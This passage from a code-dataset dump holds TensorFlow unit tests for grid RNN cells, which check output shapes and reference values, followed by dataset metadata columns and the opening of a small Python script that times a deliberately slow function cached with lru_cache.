        res_g, res_s = sess.run([g, s], {
            x:
                np.array([[1., 1., 1.]]),
            m: ((np.array([[0.1, 0.2]]), np.array([[0.3, 0.4]])),
                (np.array([[0.5, 0.6]]), np.array([[0.7, 0.8]])))
        })
        self.assertEqual(res_g[0].shape, (1, 2))
        self.assertEqual(res_s[0].c.shape, (1, 2))
        self.assertEqual(res_s[0].h.shape, (1, 2))
        self.assertEqual(res_s[1].c.shape, (1, 2))
        self.assertEqual(res_s[1].h.shape, (1, 2))
        self.assertAllClose(res_g, ([[0.36617181, 0.36617181]],))
        self.assertAllClose(
            res_s, (([[0.71053141, 0.71053141]], [[0.36617181, 0.36617181]]),
                    ([[0.72320831, 0.80555487]], [[0.39102408, 0.42150158]])))

        # emulate a loop through the input sequence,
        # where we call cell() multiple times
        root_scope.reuse_variables()
        g2, s2 = cell(x, m)
        self.assertEqual(g2[0].get_shape(), (1, 2))
        self.assertEqual(s2[0].c.get_shape(), (1, 2))
        self.assertEqual(s2[0].h.get_shape(), (1, 2))
        self.assertEqual(s2[1].c.get_shape(), (1, 2))
        self.assertEqual(s2[1].h.get_shape(), (1, 2))

        res_g2, res_s2 = sess.run([g2, s2],
                                  {x: np.array([[2., 2., 2.]]),
                                   m: res_s})
        self.assertEqual(res_g2[0].shape, (1, 2))
        self.assertEqual(res_s2[0].c.shape, (1, 2))
        self.assertEqual(res_s2[0].h.shape, (1, 2))
        self.assertEqual(res_s2[1].c.shape, (1, 2))
        self.assertEqual(res_s2[1].h.shape, (1, 2))
        self.assertAllClose(res_g2[0], [[0.58847463, 0.58847463]])
        self.assertAllClose(
            res_s2, (([[1.40469193, 1.40469193]], [[0.58847463, 0.58847463]]),
                     ([[0.97726452, 1.04626071]], [[0.4927212, 0.51137757]])))

  def testGrid2BasicLSTMCellTied(self):
    """Like testGrid2BasicLSTMCell but with weights tied across dimensions."""
    with self.cached_session(use_gpu=False) as sess:
      with variable_scope.variable_scope(
          'root', initializer=init_ops.constant_initializer(0.2)):
        x = array_ops.zeros([1, 3])
        m = ((array_ops.zeros([1, 2]), array_ops.zeros([1, 2])),
             (array_ops.zeros([1, 2]), array_ops.zeros([1, 2])))
        cell = grid_rnn_cell.Grid2BasicLSTMCell(2, tied=True)
        self.assertEqual(cell.state_size, ((2, 2), (2, 2)))

        g, s = cell(x, m)
        self.assertEqual(g[0].get_shape(), (1, 2))
        self.assertEqual(s[0].c.get_shape(), (1, 2))
        self.assertEqual(s[0].h.get_shape(), (1, 2))
        self.assertEqual(s[1].c.get_shape(), (1, 2))
        self.assertEqual(s[1].h.get_shape(), (1, 2))

        sess.run([variables.global_variables_initializer()])
        res_g, res_s = sess.run([g, s], {
            x:
                np.array([[1., 1., 1.]]),
            m: ((np.array([[0.1, 0.2]]), np.array([[0.3, 0.4]])),
                (np.array([[0.5, 0.6]]), np.array([[0.7, 0.8]])))
        })
        self.assertEqual(res_g[0].shape, (1, 2))
        self.assertEqual(res_s[0].c.shape, (1, 2))
        self.assertEqual(res_s[0].h.shape, (1, 2))
        self.assertEqual(res_s[1].c.shape, (1, 2))
        self.assertEqual(res_s[1].h.shape, (1, 2))
        self.assertAllClose(res_g[0], [[0.36617181, 0.36617181]])
        self.assertAllClose(
            res_s, (([[0.71053141, 0.71053141]], [[0.36617181, 0.36617181]]),
                    ([[0.72320831, 0.80555487]], [[0.39102408, 0.42150158]])))

        # Second step with the previous state fed back in (tied weights are
        # reused automatically, no explicit reuse_variables needed here).
        res_g, res_s = sess.run([g, s], {x: np.array([[1., 1., 1.]]), m: res_s})
        self.assertEqual(res_g[0].shape, (1, 2))
        self.assertAllClose(res_g[0], [[0.36703536, 0.36703536]])
        self.assertAllClose(
            res_s, (([[0.71200621, 0.71200621]], [[0.36703536, 0.36703536]]),
                    ([[0.80941606, 0.87550586]], [[0.40108523, 0.42199609]])))

  def testGrid2BasicLSTMCellWithRelu(self):
    """2D BasicLSTM grid with a non-recurrent ReLU dimension (single state)."""
    with self.cached_session(use_gpu=False) as sess:
      with variable_scope.variable_scope(
          'root', initializer=init_ops.constant_initializer(0.2)):
        x = array_ops.zeros([1, 3])
        m = ((array_ops.zeros([1, 2]), array_ops.zeros([1, 2])),)
        cell = grid_rnn_cell.Grid2BasicLSTMCell(
            2, tied=False, non_recurrent_fn=nn_ops.relu)
        self.assertEqual(cell.state_size, ((2, 2),))

        g, s = cell(x, m)
        self.assertEqual(g[0].get_shape(), (1, 2))
        self.assertEqual(s[0].c.get_shape(), (1, 2))
        self.assertEqual(s[0].h.get_shape(), (1, 2))

        sess.run([variables.global_variables_initializer()])
        res_g, res_s = sess.run([g, s], {
            x: np.array([[1., 1., 1.]]),
            m: ((np.array([[0.1, 0.2]]), np.array([[0.3, 0.4]])),)
        })
        self.assertEqual(res_g[0].shape, (1, 2))
        self.assertAllClose(res_g[0], [[0.31667367, 0.31667367]])
        self.assertAllClose(res_s, (([[0.29530135, 0.37520045]],
                                     [[0.17044567, 0.21292259]]),))

  # ---------------------------------------------------------------------------
  # LSTMCell
  # ---------------------------------------------------------------------------

  def testGrid2LSTMCell(self):
    """2D peephole LSTM grid: shapes and one-step reference values."""
    with self.cached_session(use_gpu=False) as sess:
      with variable_scope.variable_scope(
          'root', initializer=init_ops.constant_initializer(0.5)):
        x = array_ops.zeros([1, 3])
        m = ((array_ops.zeros([1, 2]), array_ops.zeros([1, 2])),
             (array_ops.zeros([1, 2]), array_ops.zeros([1, 2])))
        cell = grid_rnn_cell.Grid2LSTMCell(2, use_peepholes=True)
        self.assertEqual(cell.state_size, ((2, 2), (2, 2)))

        g, s = cell(x, m)
        self.assertEqual(g[0].get_shape(), (1, 2))
        self.assertEqual(s[0].c.get_shape(), (1, 2))
        self.assertEqual(s[0].h.get_shape(), (1, 2))
        self.assertEqual(s[1].c.get_shape(), (1, 2))
        self.assertEqual(s[1].h.get_shape(), (1, 2))

        sess.run([variables.global_variables_initializer()])
        res_g, res_s = sess.run([g, s], {
            x:
                np.array([[1., 1., 1.]]),
            m: ((np.array([[0.1, 0.2]]), np.array([[0.3, 0.4]])),
                (np.array([[0.5, 0.6]]), np.array([[0.7, 0.8]])))
        })
        self.assertEqual(res_g[0].shape, (1, 2))
        self.assertEqual(res_s[0].c.shape, (1, 2))
        self.assertEqual(res_s[0].h.shape, (1, 2))
        self.assertEqual(res_s[1].c.shape, (1, 2))
        self.assertEqual(res_s[1].h.shape, (1, 2))
        self.assertAllClose(res_g[0], [[0.95686918, 0.95686918]])
        self.assertAllClose(
            res_s, (([[2.41515064, 2.41515064]], [[0.95686918, 0.95686918]]),
                    ([[1.38917875, 1.49043763]], [[0.83884692, 0.86036491]])))

  def testGrid2LSTMCellTied(self):
    """Tied-weight variant of testGrid2LSTMCell; expects identical values."""
    with self.cached_session(use_gpu=False) as sess:
      with variable_scope.variable_scope(
          'root', initializer=init_ops.constant_initializer(0.5)):
        x = array_ops.zeros([1, 3])
        m = ((array_ops.zeros([1, 2]), array_ops.zeros([1, 2])),
             (array_ops.zeros([1, 2]), array_ops.zeros([1, 2])))
        cell = grid_rnn_cell.Grid2LSTMCell(2, tied=True, use_peepholes=True)
        self.assertEqual(cell.state_size, ((2, 2), (2, 2)))

        g, s = cell(x, m)
        self.assertEqual(g[0].get_shape(), (1, 2))
        self.assertEqual(s[0].c.get_shape(), (1, 2))
        self.assertEqual(s[0].h.get_shape(), (1, 2))
        self.assertEqual(s[1].c.get_shape(), (1, 2))
        self.assertEqual(s[1].h.get_shape(), (1, 2))

        sess.run([variables.global_variables_initializer()])
        res_g, res_s = sess.run([g, s], {
            x:
                np.array([[1., 1., 1.]]),
            m: ((np.array([[0.1, 0.2]]), np.array([[0.3, 0.4]])),
                (np.array([[0.5, 0.6]]), np.array([[0.7, 0.8]])))
        })
        self.assertEqual(res_g[0].shape, (1, 2))
        self.assertEqual(res_s[0].c.shape, (1, 2))
        self.assertEqual(res_s[0].h.shape, (1, 2))
        self.assertEqual(res_s[1].c.shape, (1, 2))
        self.assertEqual(res_s[1].h.shape, (1, 2))
        self.assertAllClose(res_g[0], [[0.95686918, 0.95686918]])
        self.assertAllClose(
            res_s, (([[2.41515064, 2.41515064]], [[0.95686918, 0.95686918]]),
                    ([[1.38917875, 1.49043763]], [[0.83884692, 0.86036491]])))

  def testGrid2LSTMCellWithRelu(self):
    """2D peephole LSTM grid with a non-recurrent ReLU dimension."""
    with self.cached_session() as sess:
      with variable_scope.variable_scope(
          'root', initializer=init_ops.constant_initializer(0.5)):
        x = array_ops.zeros([1, 3])
        m = ((array_ops.zeros([1, 2]), array_ops.zeros([1, 2])),)
        cell = grid_rnn_cell.Grid2LSTMCell(
            2, use_peepholes=True, non_recurrent_fn=nn_ops.relu)
        self.assertEqual(cell.state_size, ((2, 2),))

        g, s = cell(x, m)
        self.assertEqual(g[0].get_shape(), (1, 2))
        self.assertEqual(s[0].c.get_shape(), (1, 2))
        self.assertEqual(s[0].h.get_shape(), (1, 2))

        sess.run([variables.global_variables_initializer()])
        res_g, res_s = sess.run([g, s], {
            x: np.array([[1., 1., 1.]]),
            m: ((np.array([[0.1, 0.2]]), np.array([[0.3, 0.4]])),)
        })
        self.assertEqual(res_g[0].shape, (1, 2))
        self.assertAllClose(res_g[0], [[2.1831727, 2.1831727]])
        self.assertAllClose(res_s, (([[0.92270052, 1.02325559]],
                                     [[0.66159075, 0.70475441]]),))

  # ---------------------------------------------------------------------------
  # RNNCell
  # ---------------------------------------------------------------------------

  def testGrid2BasicRNNCell(self):
    """2D basic-RNN grid with batch size 2: shapes and reference values."""
    with self.cached_session() as sess:
      with variable_scope.variable_scope(
          'root', initializer=init_ops.constant_initializer(0.5)):
        x = array_ops.zeros([2, 2])
        m = (array_ops.zeros([2, 2]), array_ops.zeros([2, 2]))
        cell = grid_rnn_cell.Grid2BasicRNNCell(2)
        self.assertEqual(cell.state_size, (2, 2))

        g, s = cell(x, m)
        self.assertEqual(g[0].get_shape(), (2, 2))
        self.assertEqual(s[0].get_shape(), (2, 2))
        self.assertEqual(s[1].get_shape(), (2, 2))

        sess.run([variables.global_variables_initializer()])
        res_g, res_s = sess.run([g, s], {
            x:
                np.array([[1., 1.], [2., 2.]]),
            m: (np.array([[0.1, 0.1], [0.2, 0.2]]), np.array([[0.1, 0.1],
                                                              [0.2, 0.2]]))
        })
        self.assertEqual(res_g[0].shape, (2, 2))
        self.assertEqual(res_s[0].shape, (2, 2))
        self.assertEqual(res_s[1].shape, (2, 2))
        self.assertAllClose(res_g, ([[0.94685763, 0.94685763],
                                     [0.99480951, 0.99480951]],))
        self.assertAllClose(
            res_s, ([[0.94685763, 0.94685763], [0.99480951, 0.99480951]],
                    [[0.80049908, 0.80049908], [0.97574311, 0.97574311]]))

  def testGrid2BasicRNNCellTied(self):
    """Tied-weight variant of testGrid2BasicRNNCell; expects same values."""
    with self.cached_session() as sess:
      with variable_scope.variable_scope(
          'root', initializer=init_ops.constant_initializer(0.5)):
        x = array_ops.zeros([2, 2])
        m = (array_ops.zeros([2, 2]), array_ops.zeros([2, 2]))
        cell = grid_rnn_cell.Grid2BasicRNNCell(2, tied=True)
        self.assertEqual(cell.state_size, (2, 2))

        g, s = cell(x, m)
        self.assertEqual(g[0].get_shape(), (2, 2))
        self.assertEqual(s[0].get_shape(), (2, 2))
        self.assertEqual(s[1].get_shape(), (2, 2))

        sess.run([variables.global_variables_initializer()])
        res_g, res_s = sess.run([g, s], {
            x:
                np.array([[1., 1.], [2., 2.]]),
            m: (np.array([[0.1, 0.1], [0.2, 0.2]]), np.array([[0.1, 0.1],
                                                              [0.2, 0.2]]))
        })
        self.assertEqual(res_g[0].shape, (2, 2))
        self.assertEqual(res_s[0].shape, (2, 2))
        self.assertEqual(res_s[1].shape, (2, 2))
        self.assertAllClose(res_g, ([[0.94685763, 0.94685763],
                                     [0.99480951, 0.99480951]],))
        self.assertAllClose(
            res_s, ([[0.94685763, 0.94685763], [0.99480951, 0.99480951]],
                    [[0.80049908, 0.80049908], [0.97574311, 0.97574311]]))

  def testGrid2BasicRNNCellWithRelu(self):
    """2D basic-RNN grid with a non-recurrent ReLU dimension (single state)."""
    with self.cached_session() as sess:
      with variable_scope.variable_scope(
          'root', initializer=init_ops.constant_initializer(0.5)):
        x = array_ops.zeros([1, 2])
        m = (array_ops.zeros([1, 2]),)
        cell = grid_rnn_cell.Grid2BasicRNNCell(2, non_recurrent_fn=nn_ops.relu)
        self.assertEqual(cell.state_size, (2,))

        g, s = cell(x, m)
        self.assertEqual(g[0].get_shape(), (1, 2))
        self.assertEqual(s[0].get_shape(), (1, 2))

        sess.run([variables.global_variables_initializer()])
        res_g, res_s = sess.run(
            [g, s], {x: np.array([[1., 1.]]),
                     m: np.array([[0.1, 0.1]])})
        self.assertEqual(res_g[0].shape, (1, 2))
        self.assertEqual(res_s[0].shape, (1, 2))
        self.assertAllClose(res_g, ([[1.80049896, 1.80049896]],))
        self.assertAllClose(res_s, ([[0.80049896, 0.80049896]],))

  # ---------------------------------------------------------------------------
  # 1-LSTM
  # ---------------------------------------------------------------------------

  def testGrid1LSTMCell(self):
    """1D peephole LSTM grid, including steps driven by state only."""
    with self.cached_session() as sess:
      with variable_scope.variable_scope(
          'root', initializer=init_ops.constant_initializer(0.5)) as root_scope:
        x = array_ops.zeros([1, 3])
        m = ((array_ops.zeros([1, 2]), array_ops.zeros([1, 2])),)
        cell = grid_rnn_cell.Grid1LSTMCell(2, use_peepholes=True)
        self.assertEqual(cell.state_size, ((2, 2),))

        g, s = cell(x, m)
        self.assertEqual(g[0].get_shape(), (1, 2))
        self.assertEqual(s[0].c.get_shape(), (1, 2))
        self.assertEqual(s[0].h.get_shape(), (1, 2))

        sess.run([variables.global_variables_initializer()])
        res_g, res_s = sess.run([g, s], {
            x: np.array([[1., 1., 1.]]),
            m: ((np.array([[0.1, 0.2]]), np.array([[0.3, 0.4]])),)
        })
        self.assertEqual(res_g[0].shape, (1, 2))
        self.assertEqual(res_s[0].c.shape, (1, 2))
        self.assertEqual(res_s[0].h.shape, (1, 2))
        self.assertAllClose(res_g, ([[0.91287315, 0.91287315]],))
        self.assertAllClose(res_s, (([[2.26285243, 2.26285243]],
                                     [[0.91287315, 0.91287315]]),))

        root_scope.reuse_variables()

        # Empty input: subsequent steps are driven purely by the fed state.
        x2 = array_ops.zeros([0, 0])
        g2, s2 = cell(x2, m)
        self.assertEqual(g2[0].get_shape(), (1, 2))
        self.assertEqual(s2[0].c.get_shape(), (1, 2))
        self.assertEqual(s2[0].h.get_shape(), (1, 2))

        sess.run([variables.global_variables_initializer()])
        res_g2, res_s2 = sess.run([g2, s2], {m: res_s})
        self.assertEqual(res_g2[0].shape, (1, 2))
        self.assertEqual(res_s2[0].c.shape, (1, 2))
        self.assertEqual(res_s2[0].h.shape, (1, 2))
        self.assertAllClose(res_g2, ([[0.9032144, 0.9032144]],))
        self.assertAllClose(res_s2, (([[2.79966092, 2.79966092]],
                                      [[0.9032144, 0.9032144]]),))

        g3, s3 = cell(x2, m)
        self.assertEqual(g3[0].get_shape(), (1, 2))
        self.assertEqual(s3[0].c.get_shape(), (1, 2))
        self.assertEqual(s3[0].h.get_shape(), (1, 2))

        sess.run([variables.global_variables_initializer()])
        res_g3, res_s3 = sess.run([g3, s3], {m: res_s2})
        self.assertEqual(res_g3[0].shape, (1, 2))
        self.assertEqual(res_s3[0].c.shape, (1, 2))
        self.assertEqual(res_s3[0].h.shape, (1, 2))
        self.assertAllClose(res_g3, ([[0.92727238, 0.92727238]],))
        self.assertAllClose(res_s3, (([[3.3529923, 3.3529923]],
                                      [[0.92727238, 0.92727238]]),))

  # ---------------------------------------------------------------------------
  # 3-LSTM
  # ---------------------------------------------------------------------------

  def testGrid3LSTMCell(self):
    """3D peephole LSTM grid: three LSTM state pairs, one-step values."""
    with self.cached_session() as sess:
      with variable_scope.variable_scope(
          'root', initializer=init_ops.constant_initializer(0.5)):
        x = array_ops.zeros([1, 3])
        m = ((array_ops.zeros([1, 2]), array_ops.zeros([1, 2])),
             (array_ops.zeros([1, 2]), array_ops.zeros([1, 2])),
             (array_ops.zeros([1, 2]), array_ops.zeros([1, 2])))
        cell = grid_rnn_cell.Grid3LSTMCell(2, use_peepholes=True)
        self.assertEqual(cell.state_size, ((2, 2), (2, 2), (2, 2)))

        g, s = cell(x, m)
        self.assertEqual(g[0].get_shape(), (1, 2))
        self.assertEqual(s[0].c.get_shape(), (1, 2))
        self.assertEqual(s[0].h.get_shape(), (1, 2))
        self.assertEqual(s[1].c.get_shape(), (1, 2))
        self.assertEqual(s[1].h.get_shape(), (1, 2))
        self.assertEqual(s[2].c.get_shape(), (1, 2))
        self.assertEqual(s[2].h.get_shape(), (1, 2))

        sess.run([variables.global_variables_initializer()])
        res_g, res_s = sess.run([g, s], {
            x:
                np.array([[1., 1., 1.]]),
            m: ((np.array([[0.1, 0.2]]), np.array([[0.3, 0.4]])),
                (np.array([[0.5, 0.6]]), np.array([[0.7, 0.8]])), (np.array(
                    [[-0.1, -0.2]]), np.array([[-0.3, -0.4]])))
        })
        self.assertEqual(res_g[0].shape, (1, 2))
        self.assertEqual(res_s[0].c.shape, (1, 2))
        self.assertEqual(res_s[0].h.shape, (1, 2))
        self.assertEqual(res_s[1].c.shape, (1, 2))
        self.assertEqual(res_s[1].h.shape, (1, 2))
        self.assertEqual(res_s[2].c.shape, (1, 2))
        self.assertEqual(res_s[2].h.shape, (1, 2))
        self.assertAllClose(res_g, ([[0.96892911, 0.96892911]],))
        self.assertAllClose(
            res_s, (([[2.45227885, 2.45227885]], [[0.96892911, 0.96892911]]),
                    ([[1.33592629, 1.4373529]], [[0.80867189, 0.83247656]]),
                    ([[0.7317788, 0.63205892]], [[0.56548983, 0.50446129]])))

  # ---------------------------------------------------------------------------
  # Edge cases
  # ---------------------------------------------------------------------------

  def testGridRNNEdgeCasesLikeRelu(self):
    """A 1D non-recurrent grid cell configured to behave like a ReLU layer."""
    with self.cached_session() as sess:
      with variable_scope.variable_scope(
          'root', initializer=init_ops.constant_initializer(0.5)):
        x = array_ops.zeros([3, 2])
        m = ()

        # this is equivalent to relu
        cell = grid_rnn_cell.GridRNNCell(
            num_units=2,
            num_dims=1,
            input_dims=0,
            output_dims=0,
            non_recurrent_dims=0,
            non_recurrent_fn=nn_ops.relu)
        g, s = cell(x, m)
        self.assertEqual(g[0].get_shape(), (3, 2))
        self.assertEqual(s, ())

        sess.run([variables.global_variables_initializer()])
        res_g, res_s = sess.run([g, s],
                                {x: np.array([[1., -1.], [-2, 1], [2, -1]])})
        self.assertEqual(res_g[0].shape, (3, 2))
        self.assertEqual(res_s, ())
        self.assertAllClose(res_g, ([[0, 0], [0, 0], [0.5, 0.5]],))

  def testGridRNNEdgeCasesNoOutput(self):
    """A 2D grid cell with output_dims=None: state only, empty output."""
    with self.cached_session() as sess:
      with variable_scope.variable_scope(
          'root', initializer=init_ops.constant_initializer(0.5)):
        x = array_ops.zeros([1, 2])
        m = ((array_ops.zeros([1, 2]), array_ops.zeros([1, 2])),)

        # This cell produces no output
        cell = grid_rnn_cell.GridRNNCell(
            num_units=2,
            num_dims=2,
            input_dims=0,
            output_dims=None,
            non_recurrent_dims=0,
            non_recurrent_fn=nn_ops.relu)
        g, s = cell(x, m)
        self.assertEqual(g, ())
        self.assertEqual(s[0].c.get_shape(), (1, 2))
        self.assertEqual(s[0].h.get_shape(), (1, 2))

        sess.run([variables.global_variables_initializer()])
        res_g, res_s = sess.run([g, s], {
            x: np.array([[1., 1.]]),
            m: ((np.array([[0.1, 0.1]]), np.array([[0.1, 0.1]])),)
        })
        self.assertEqual(res_g, ())
        self.assertEqual(res_s[0].c.shape, (1, 2))
        self.assertEqual(res_s[0].h.shape, (1, 2))

  # ---------------------------------------------------------------------------
  # Test with tf.nn.rnn
  # ---------------------------------------------------------------------------

  def testGrid2LSTMCellWithRNN(self):
    """Unrolls a Grid2LSTMCell with static_rnn and checks finite outputs."""
    batch_size = 3
    input_size = 5
    max_length = 6  # unrolled up to this length
    num_units = 2

    with variable_scope.variable_scope(
        'root', initializer=init_ops.constant_initializer(0.5)):
      cell = grid_rnn_cell.Grid2LSTMCell(num_units=num_units)

      inputs = max_length * [
          array_ops.placeholder(
              dtypes.float32, shape=(batch_size, input_size))
      ]

      outputs, state = rnn.static_rnn(cell, inputs, dtype=dtypes.float32)

    self.assertEqual(len(outputs), len(inputs))
    self.assertEqual(state[0].c.get_shape(), (batch_size, 2))
    self.assertEqual(state[0].h.get_shape(), (batch_size, 2))
    self.assertEqual(state[1].c.get_shape(), (batch_size, 2))
    self.assertEqual(state[1].h.get_shape(), (batch_size, 2))

    for out, inp in zip(outputs, inputs):
      self.assertEqual(len(out), 1)
      self.assertEqual(out[0].get_shape()[0], inp.get_shape()[0])
      self.assertEqual(out[0].get_shape()[1], num_units)
      self.assertEqual(out[0].dtype, inp.dtype)

    with self.cached_session() as sess:
      sess.run(variables.global_variables_initializer())

      input_value = np.ones((batch_size, input_size))
      values = sess.run(outputs + [state], feed_dict={inputs[0]: input_value})
      for tp in values[:-1]:
        for v in tp:
          self.assertTrue(np.all(np.isfinite(v)))
      for tp in values[-1]:
        for st in tp:
          for v in st:
            self.assertTrue(np.all(np.isfinite(v)))

  def testGrid2LSTMCellReLUWithRNN(self):
    """Same as testGrid2LSTMCellWithRNN but with a non-recurrent ReLU dim."""
    batch_size = 3
    input_size = 5
    max_length = 6  # unrolled up to this length
    num_units = 2

    with variable_scope.variable_scope(
        'root', initializer=init_ops.constant_initializer(0.5)):
      cell = grid_rnn_cell.Grid2LSTMCell(
          num_units=num_units, non_recurrent_fn=nn_ops.relu)

      inputs = max_length * [
          array_ops.placeholder(dtypes.float32, shape=(batch_size, input_size))
      ]

      outputs, state = rnn.static_rnn(cell, inputs, dtype=dtypes.float32)

    self.assertEqual(len(outputs), len(inputs))
    self.assertEqual(state[0].c.get_shape(), (batch_size, 2))
    self.assertEqual(state[0].h.get_shape(), (batch_size, 2))

    for out, inp in zip(outputs, inputs):
      self.assertEqual(len(out), 1)
      self.assertEqual(out[0].get_shape()[0], inp.get_shape()[0])
      self.assertEqual(out[0].get_shape()[1], num_units)
      self.assertEqual(out[0].dtype, inp.dtype)

    with self.cached_session() as sess:
      sess.run(variables.global_variables_initializer())

      input_value = np.ones((batch_size, input_size))
      values = sess.run(outputs + [state], feed_dict={inputs[0]: input_value})
      for tp in values[:-1]:
        for v in tp:
          self.assertTrue(np.all(np.isfinite(v)))
      for tp in values[-1]:
        for st in tp:
          for v in st:
            self.assertTrue(np.all(np.isfinite(v)))

  def testGrid3LSTMCellReLUWithRNN(self):
    """Unrolls a Grid3LSTMCell with a ReLU dim and checks finite outputs."""
    batch_size = 3
    input_size = 5
    max_length = 6  # unrolled up to this length
    num_units = 2

    with variable_scope.variable_scope(
        'root', initializer=init_ops.constant_initializer(0.5)):
      cell = grid_rnn_cell.Grid3LSTMCell(
          num_units=num_units, non_recurrent_fn=nn_ops.relu)

      inputs = max_length * [
          array_ops.placeholder(dtypes.float32, shape=(batch_size, input_size))
      ]

      outputs, state = rnn.static_rnn(cell, inputs, dtype=dtypes.float32)

    self.assertEqual(len(outputs), len(inputs))
    self.assertEqual(state[0].c.get_shape(), (batch_size, 2))
    self.assertEqual(state[0].h.get_shape(), (batch_size, 2))
    self.assertEqual(state[1].c.get_shape(), (batch_size, 2))
    self.assertEqual(state[1].h.get_shape(), (batch_size, 2))

    for out, inp in zip(outputs, inputs):
      self.assertEqual(len(out), 1)
      self.assertEqual(out[0].get_shape()[0], inp.get_shape()[0])
      self.assertEqual(out[0].get_shape()[1], num_units)
      self.assertEqual(out[0].dtype, inp.dtype)

    with self.cached_session() as sess:
      sess.run(variables.global_variables_initializer())

      input_value = np.ones((batch_size, input_size))
      values = sess.run(outputs + [state], feed_dict={inputs[0]: input_value})
      for tp in values[:-1]:
        for v in tp:
          self.assertTrue(np.all(np.isfinite(v)))
      for tp in values[-1]:
        for st in tp:
          for v in st:
            self.assertTrue(np.all(np.isfinite(v)))

  def testGrid1LSTMCellWithRNN(self):
    """Unrolls a Grid1LSTMCell; only the first step receives real input."""
    batch_size = 3
    input_size = 5
    max_length = 6  # unrolled up to this length
    num_units = 2

    with variable_scope.variable_scope(
        'root', initializer=init_ops.constant_initializer(0.5)):
      cell = grid_rnn_cell.Grid1LSTMCell(num_units=num_units)

      # for 1-LSTM, we only feed the first step
      inputs = ([
          array_ops.placeholder(
              dtypes.float32, shape=(batch_size, input_size))
      ] + (max_length - 1) * [array_ops.zeros([batch_size, input_size])])

      outputs, state = rnn.static_rnn(cell, inputs, dtype=dtypes.float32)

    self.assertEqual(len(outputs), len(inputs))
    self.assertEqual(state[0].c.get_shape(), (batch_size, 2))
    self.assertEqual(state[0].h.get_shape(), (batch_size, 2))

    for out, inp in zip(outputs, inputs):
      self.assertEqual(len(out), 1)
      self.assertEqual(out[0].get_shape(), (3, num_units))
      self.assertEqual(out[0].dtype, inp.dtype)

    with self.cached_session() as sess:
      sess.run(variables.global_variables_initializer())

      input_value = np.ones((batch_size, input_size))
      values = sess.run(outputs + [state], feed_dict={inputs[0]: input_value})
      for tp in values[:-1]:
        for v in tp:
          self.assertTrue(np.all(np.isfinite(v)))
      for tp in values[-1]:
        for st in tp:
          for v in st:
            self.assertTrue(np.all(np.isfinite(v)))

  def testGrid2LSTMCellWithRNNAndDynamicBatchSize(self):
    """Test for #4296."""
    input_size = 5
    max_length = 6  # unrolled up to this length
    num_units = 2

    with variable_scope.variable_scope(
        'root', initializer=init_ops.constant_initializer(0.5)):
      cell = grid_rnn_cell.Grid2LSTMCell(num_units=num_units)

      # Batch dimension is left dynamic (None) on purpose.
      inputs = max_length * [
          array_ops.placeholder(dtypes.float32, shape=(None, input_size))
      ]

      outputs, state = rnn.static_rnn(cell, inputs, dtype=dtypes.float32)

    self.assertEqual(len(outputs), len(inputs))

    for out, inp in zip(outputs, inputs):
      self.assertEqual(len(out), 1)
      self.assertTrue(out[0].get_shape().dims[0].value is None)
      self.assertEqual(out[0].get_shape().dims[1], num_units)
      self.assertEqual(out[0].dtype, inp.dtype)

    with self.cached_session() as sess:
      sess.run(variables.global_variables_initializer())

      input_value = np.ones((3, input_size))
      values = sess.run(outputs + [state], feed_dict={inputs[0]: input_value})
      for tp in values[:-1]:
        for v in tp:
          self.assertTrue(np.all(np.isfinite(v)))
      for tp in values[-1]:
        for st in tp:
          for v in st:
            self.assertTrue(np.all(np.isfinite(v)))

  def testGrid2LSTMCellLegacy(self):
    """Test for legacy case (when state_is_tuple=False)."""
    with self.cached_session() as sess:
      with variable_scope.variable_scope(
          'root', initializer=init_ops.constant_initializer(0.5)):
        x = array_ops.zeros([1, 3])
        # Legacy concatenated state: both (c, h) pairs packed into one tensor.
        m = array_ops.zeros([1, 8])
        cell = grid_rnn_cell.Grid2LSTMCell(
            2, use_peepholes=True, state_is_tuple=False, output_is_tuple=False)
        self.assertEqual(cell.state_size, 8)

        g, s = cell(x, m)
        self.assertEqual(g.get_shape(), (1, 2))
        self.assertEqual(s.get_shape(), (1, 8))

        sess.run([variables.global_variables_initializer()])
        res = sess.run([g, s], {
            x: np.array([[1., 1., 1.]]),
            m: np.array([[0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8]])
        })
        self.assertEqual(res[0].shape, (1, 2))
        self.assertEqual(res[1].shape, (1, 8))
        self.assertAllClose(res[0], [[0.95686918, 0.95686918]])
        self.assertAllClose(res[1], [[
            2.41515064, 2.41515064, 0.95686918, 0.95686918, 1.38917875,
            1.49043763, 0.83884692, 0.86036491
        ]])
# Script entry point: run all tests in this module when executed directly.
if __name__ == '__main__':
  test.main()
| 40.463807
| 80
| 0.574571
| 4,287
| 30,186
| 3.898764
| 0.066014
| 0.150772
| 0.0423
| 0.057257
| 0.848271
| 0.822125
| 0.812433
| 0.802561
| 0.775278
| 0.765586
| 0
| 0.099232
| 0.24518
| 30,186
| 745
| 81
| 40.518121
| 0.634321
| 0.035182
| 0
| 0.737896
| 0
| 0
| 0.002899
| 0
| 0
| 0
| 0
| 0
| 0.353923
| 1
| 0.03172
| false
| 0
| 0.021703
| 0
| 0.055092
| 0.001669
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
364de1c024e2d1e5cd215cf2a42b08710dcc545c
| 1,675
|
py
|
Python
|
python/lrucache/foo.py
|
trammell/test
|
ccac5e1dac947032e64d813e53cb961417a58d05
|
[
"Artistic-2.0"
] | null | null | null |
python/lrucache/foo.py
|
trammell/test
|
ccac5e1dac947032e64d813e53cb961417a58d05
|
[
"Artistic-2.0"
] | null | null | null |
python/lrucache/foo.py
|
trammell/test
|
ccac5e1dac947032e64d813e53cb961417a58d05
|
[
"Artistic-2.0"
] | null | null | null |
#!/usr/bin/env python3
"""
Sample LRUCache code. See https://docs.python.org/3/library/functools.html
for gory details.
"""
from functools import lru_cache
import time
@lru_cache(maxsize=4)
def slowadd(a, b):
    """Add two numbers, poorly: sleeps one second to simulate expensive work.

    Results are memoized by lru_cache, so repeated calls with the same
    (a, b) return instantly.
    """
    total = a + b
    time.sleep(1)
    return total
def _time_call(a, b):
    """Call slowadd(a, b), printing the sum and the elapsed wall time.

    Replaces eight copy-pasted start/print/print stanzas; the printed output
    is identical for each (a, b) pair.
    """
    start_time = time.time()
    print("%d + %d = %d" % (a, b, slowadd(a, b)))
    print("--- %s seconds ---\n" % (time.time() - start_time))


